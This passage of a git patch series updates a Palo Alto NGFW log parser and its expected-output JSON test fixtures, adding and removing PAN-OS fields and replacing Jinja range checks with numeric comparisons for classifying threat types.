diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
index b22a31f88..9a1d42f34 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
index 9f659a601..ea53d3353 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
index d2477e4f1..dee27d0e1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
@@ -30,7 +30,14 @@
       "serial_number": "01545100000000"
     },
     "paloalto": {
-      "Threat_ContentType": "login"
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
index a3738eaf2..23d0aaaf8 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
@@ -32,6 +32,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
index 42b530f45..c3b8bcffc 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index 4e097a01e..b6430085e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
@@ -59,7 +59,13 @@
       "serial_number": "016401004874"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
+      "VirtualLocation": "vsys",
+      "VirtualSystemName": "VSYS",
       "threat": {
         "id": "9999"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
index 207cd20b3..afc856776 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
@@ -72,6 +72,24 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "X-Phone",
+      "PanOSDestinationDeviceHost": "pan-622",
+      "PanOSDestinationDeviceMac": "620797415366",
+      "PanOSDestinationDeviceModel": "MI",
+      "PanOSDestinationDeviceOSFamily": "A1",
+      "PanOSDestinationDeviceOSVersion": "Android v9.1",
+      "PanOSDestinationDeviceProfile": "x-profile",
+      "PanOSDestinationDeviceVendor": "Xiaomi",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceDeviceHost": "pan-505",
+      "PanOSSourceDeviceModel": "Note 4G",
+      "PanOSSourceDeviceProfile": "x-profile",
+      "PanOSSourceDeviceVendor": "Lenovo",
+      "PanOSSourceLocation": "LY",
+      "PanOSThreatCategory": "unknown",
+      "PanOSThreatID": "27379(27379)",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index cff329e0f..571880744 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
@@ -51,7 +51,12 @@
       "serial_number": "001701000000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys",
       "threat": {
         "id": "34805",
         "name": "PDF Exploit Evasion Found"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
index b74fdb564..4fd068d08 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
@@ -72,6 +72,12 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSessionStartTime": "Jul 31 2022 12:43:06",
+      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "LF-5698-NR"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
index 1469faf57..a892a2a7b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
@@ -72,6 +72,12 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSessionStartTime": "Aug 02 2022 06:41:44",
+      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
+      "URLCategory": "low-risk",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "GP cloud service"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
index 9bf8bd0de..58c77fa30 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
@@ -78,6 +78,29 @@
       "version": "2.0"
     },
     "paloalto": {
+      "PanOSContainerName": "pan-dp-77754f4",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "N-Phone",
+      "PanOSDestinationDeviceHost": "pan-355",
+      "PanOSDestinationDeviceMac": "530589561221",
+      "PanOSDestinationDeviceModel": "Nexus",
+      "PanOSDestinationDeviceOSFamily": "H1511",
+      "PanOSDestinationDeviceOSVersion": "Android v7",
+      "PanOSDestinationDeviceProfile": "n-profile",
+      "PanOSDestinationDeviceVendor": "Google",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSGPHostID": "xxxxxxxxxxxxxx",
+      "PanOSHASessionOwner": "session_owner-4",
+      "PanOSSessionStartTime": "Feb 27 2021 20:15:48",
+      "PanOSSourceDeviceHost": "pan-301",
+      "PanOSSourceDeviceModel": "Nexus",
+      "PanOSSourceDeviceProfile": "n-profile",
+      "PanOSSourceDeviceVendor": "Google",
+      "PanOSSourceDynamicAddressGroup": "aqua_dag",
+      "PanOSSourceLocation": "east-coast",
+      "PanOSX-Forwarded-ForIP": "1.1.1.1",
+      "URLCategory": "custom-category",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
index 1621cfeed..3445ddc4f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
@@ -49,7 +49,8 @@
       "serial_number": "026701002040"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
index 324587ad2..3238eb5e4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
@@ -49,7 +49,8 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "deny"
+      "Threat_ContentType": "deny",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json
index f3a6b58d6..41d495725 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
@@ -77,6 +77,25 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
+      "PanOSContainerName": "pan-dp-77754f4",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "L-Phone",
+      "PanOSDestinationDeviceHost": "pan-506",
+      "PanOSDestinationDeviceMac": "150083646537",
+      "PanOSDestinationDeviceModel": "Note XT",
+      "PanOSDestinationDeviceOSFamily": "K8",
+      "PanOSDestinationDeviceOSVersion": "Android v8",
+      "PanOSDestinationDeviceProfile": "l-profile",
+      "PanOSDestinationDeviceVendor": "Lenovo",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceDeviceHost": "pan-505",
+      "PanOSSourceDeviceModel": "Note 4G",
+      "PanOSSourceDeviceProfile": "l-profile",
+      "PanOSSourceDeviceVendor": "Lenovo",
+      "PanOSSourceDynamicAddressGroup": "blue_dag",
+      "PanOSSourceLocation": "west-coast",
+      "URLCategory": "sports",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json
index ea8e442b5..c90ab6ed6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
@@ -53,6 +53,10 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
index 8c7d37227..edd76521b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
@@ -60,8 +60,13 @@
       "serial_number": "111111111111"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "738",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
       "Threat_ContentType": "wildfire",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxx"
       },

From f1eeaae60b543557d034df7cba8d641ebaf2d392 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 31 Oct 2024 12:21:33 +0200
Subject: [PATCH 188/317] Avoid disabled jinja functions

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 14 +++++++-------
 .../paloalto-ngfw/tests/test_ldap_brute_force.json |  3 ++-
 .../paloalto-ngfw/tests/test_threat.json           |  3 ++-
 .../paloalto-ngfw/tests/test_threat_02.json        |  3 ++-
 .../paloalto-ngfw/tests/threat-url-xff.json        |  3 ++-
 .../paloalto-ngfw/tests/threat_csv.json            |  3 ++-
 6 files changed, 17 insertions(+), 12 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 835674257..bf144527c 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -735,21 +735,21 @@ stages:
       - set:
           paloalto.threat.type: >
             {%- set id = parsed_threat.message.threat_code | int -%}
-            {%- if id in range(8000, 8100) -%}
+            {%- if 8000 <= id < 8100 -%}
             {%- set name = 'scan detection' -%}
-            {%- elif id in range(8500, 8600) -%}
+            {%- elif 8500 <= id < 8600 -%}
             {%- set name = 'flood detection' -%}
             {%- elif id == 9999 -%}
             {%- set name = 'URL filtering log' -%}
-            {%- elif id in range(10000, 20000) -%}
+            {%- elif 10000 <= id < 20000 -%}
             {%- set name = 'spyware phone home detection' -%}
-            {%- elif id in range(20000, 30000) -%}
+            {%- elif 20000 <= id < 30000 -%}
             {%- set name = 'spyware download detection' -%}
-            {%- elif id in range(30000, 45000) -%}
+            {%- elif 30000 <= id < 45000 -%}
             {%- set name = 'vulnerability exploit detection' -%}
-            {%- elif id in range(52000, 53000) -%}
+            {%- elif 52000 <= id < 53000 -%}
             {%- set name = 'filetype detection' -%}
-            {%- elif id in range(60000 , 70000) -%}
+            {%- elif 60000 <= id < 70000 -%}
             {%- set name = 'data filtering detection' -%}
             {%- endif -%}
             {{name | default('custom threat')}}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index aab8fbd6b..f569f8246 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
@@ -59,7 +59,8 @@
       "VirtualLocation": "vsys1",
       "threat": {
         "id": "40005",
-        "name": "LDAP: User Login Brute Force Attempt"
+        "name": "LDAP: User Login Brute Force Attempt",
+        "type": "vulnerability exploit detection"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 48dc1f1bd..51579bdcb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
@@ -54,7 +54,8 @@
       "Threat_ContentType": "url",
       "VirtualLocation": "vsys1",
       "threat": {
-        "id": "9999"
+        "id": "9999",
+        "type": "URL filtering log"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index e45d01607..eadb40265 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
@@ -65,7 +65,8 @@
       "VirtualLocation": "vsys1",
       "threat": {
         "id": "95187",
-        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
+        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
+        "type": "custom threat"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index b6430085e..57cb1121b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
@@ -67,7 +67,8 @@
       "VirtualLocation": "vsys",
       "VirtualSystemName": "VSYS",
       "threat": {
-        "id": "9999"
+        "id": "9999",
+        "type": "URL filtering log"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index 571880744..20a78b306 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
@@ -59,7 +59,8 @@
       "VirtualLocation": "vsys",
       "threat": {
         "id": "34805",
-        "name": "PDF Exploit Evasion Found"
+        "name": "PDF Exploit Evasion Found",
+        "type": "vulnerability exploit detection"
       }
     },
     "related": {

From ad9efd9aa7daa3d0ebb494aab1da4a608f156bda Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 14:45:27 +0200
Subject: [PATCH 189/317] Rebuild tests for PaloAlto NGFW

---
 .../paloalto-ngfw/tests/User_id_1_csv.json    |  9 +-------
 .../paloalto-ngfw/tests/User_id_2_csv.json    |  9 +-------
 .../paloalto-ngfw/tests/auth_cef.json         |  7 ------
 .../paloalto-ngfw/tests/decryption_cef.json   |  3 ---
 .../paloalto-ngfw/tests/file_cef.json         |  4 ----
 .../paloalto-ngfw/tests/fix_bug_with_int.json |  3 +--
 .../tests/fix_bug_without_int.json            |  3 +--
 .../tests/globalprotect_cef.json              |  1 -
 .../tests/globalprotect_csv.json              |  2 --
 .../tests/globalprotect_csv_2.json            |  2 --
 .../paloalto-ngfw/tests/hip_match_cef.json    |  3 ---
 .../paloalto-ngfw/tests/icmp_allow_csv.json   |  3 +--
 .../paloalto-ngfw/tests/iptag_cef.json        |  4 ----
 .../tests/network_threat_alert_1.json         |  8 +------
 .../tests/network_threat_alert_2.json         |  9 +-------
 .../paloalto-ngfw/tests/sctp_cef.json         |  4 ----
 .../paloalto-ngfw/tests/system_csv.json       |  5 ----
 .../paloalto-ngfw/tests/tcp_allow_csv.json    |  3 +--
 .../tests/test_cloud_election_json.json       |  4 ----
 .../tests/test_dhcp_renew_json.json           |  4 ----
 .../tests/test_dns_proxy_json.json            |  4 ----
 .../tests/test_file_alert_json.json           |  8 +------
 .../tests/test_globalprotect.json             |  2 --
 .../tests/test_installed_package_json.json    |  4 ----
 .../tests/test_ldap_brute_force.json          |  8 +------
 .../tests/test_new_file_type.json             |  8 +------
 .../tests/test_new_globalprotect.json         |  5 ----
 .../tests/test_new_threat_type.json           |  5 ----
 .../tests/test_new_url_type.json              |  8 +------
 .../tests/test_ntp_sync_json.json             |  4 ----
 .../tests/test_port_up_json.json              |  4 ----
 .../tests/test_registration_succeed_json.json |  4 ----
 .../paloalto-ngfw/tests/test_system.json      |  5 ----
 .../tests/test_system_event_10_json.json      |  4 ----
 .../tests/test_system_event_11_json.json      |  4 ----
 .../tests/test_system_event_12_json.json      |  4 ----
 .../tests/test_system_event_1_json.json       |  4 ----
 .../tests/test_system_event_2_json.json       |  4 ----
 .../tests/test_system_event_3_json.json       |  4 ----
 .../tests/test_system_event_4_json.json       |  4 ----
 .../tests/test_system_event_5_json.json       |  4 ----
 .../tests/test_system_event_6_json.json       |  4 ----
 .../tests/test_system_event_7_json.json       |  4 ----
 .../tests/test_system_event_8_json.json       |  4 ----
 .../tests/test_system_event_9_json.json       |  4 ----
 .../paloalto-ngfw/tests/test_threat.json      |  8 +------
 .../paloalto-ngfw/tests/test_threat_02.json   |  8 +------
 .../tests/test_timestamp_palo.json            |  5 ----
 .../tests/test_traffic_event_1_json.json      |  8 +------
 .../tests/test_traffic_event_2_json.json      |  8 +------
 .../tests/test_update_content_json.json       |  4 ----
 .../tests/test_upgrade_package_json.json      |  4 ----
 .../tests/test_user_authentication_json.json  |  4 ----
 .../paloalto-ngfw/tests/test_userid.json      |  9 +-------
 .../tests/test_web_authentication_json.json   |  4 ----
 .../tests/test_wildfire_failure_json.json     |  4 ----
 .../paloalto-ngfw/tests/threat-url-xff.json   |  9 +-------
 .../paloalto-ngfw/tests/threat_cef.json       | 18 ---------------
 .../paloalto-ngfw/tests/threat_csv.json       |  8 +------
 .../paloalto-ngfw/tests/traffic1_csv.json     |  6 -----
 .../paloalto-ngfw/tests/traffic2_csv.json     |  6 -----
 .../paloalto-ngfw/tests/traffic_cef.json      | 23 -------------------
 .../tests/traffic_with_resotimestamp.json     |  3 +--
 .../paloalto-ngfw/tests/udp_deny_csv.json     |  3 +--
 .../paloalto-ngfw/tests/url_cef.json          | 19 ---------------
 .../paloalto-ngfw/tests/userid_cef.json       |  4 ----
 .../paloalto-ngfw/tests/wildfire1_json.json   |  5 ----
 67 files changed, 21 insertions(+), 356 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json
index 08c69d61f..dba765bd4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
@@ -30,14 +30,7 @@
       "serial_number": "016401002222"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "12",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "0",
-      "Threat_ContentType": "login",
-      "VirtualLocation": "vsys",
-      "VirtualSystemID": "1"
+      "Threat_ContentType": "login"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
index 539963216..63c79e671 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
@@ -30,14 +30,7 @@
       "serial_number": "01640103000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "12",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "0",
-      "Threat_ContentType": "login",
-      "VirtualLocation": "vsys",
-      "VirtualSystemID": "1"
+      "Threat_ContentType": "login"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
index ff12d8db6..1b4a52135 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
@@ -57,13 +57,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSourceDeviceHost": "src_host_list-0",
-      "PanOSSourceDeviceModel": "src_model_list-1",
-      "PanOSSourceDeviceProfile": "src_profile_list-1",
-      "PanOSSourceDeviceVendor": "src_vendor_list-1",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "xxxxx"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
index 1a4fba4b4..e213912c2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
@@ -61,9 +61,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "ip": [
         "1.1.1.1"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
index 2da36f33e..965583ed3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
@@ -65,10 +65,6 @@
     },
     "paloalto": {
       "DirectionOfAttack": "client to server",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSSourceLocation": "1.1.1.1-1.1.1.1",
-      "URLCategory": "any",
-      "VirtualLocation": "smtp",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
index 512ae89e7..4dadbb51b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
@@ -52,8 +52,7 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
index add589697..4863396f8 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
@@ -52,8 +52,7 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
index 4fd7b8802..09505692f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
@@ -42,7 +42,6 @@
       "version": "2.0"
     },
     "paloalto": {
-      "PanOSQuarantineReason": "Malicious Traffic",
       "authentication": {
         "method": "RADIUS"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..0c72fdb63 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
@@ -34,9 +34,7 @@
       "serial_number": "ABCDEFG"
     },
     "paloalto": {
-      "EventID": "gw-auth",
       "Threat_ContentType": "0",
-      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "login"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..2f8cb93ae 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
@@ -34,9 +34,7 @@
       "serial_number": "DFN3535D"
     },
     "paloalto": {
-      "EventID": "gateway-config-release",
       "Threat_ContentType": "0",
-      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "configuration"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
index 6a0a99b82..966ea0b88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
@@ -40,9 +40,6 @@
       "version": "2.0"
     },
     "paloalto": {
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
index e4e153224..6e8e88e79 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
@@ -49,8 +49,7 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "start",
-      "VirtualLocation": "vsys"
+      "Threat_ContentType": "start"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
index 9d2db872a..4eef50d9d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
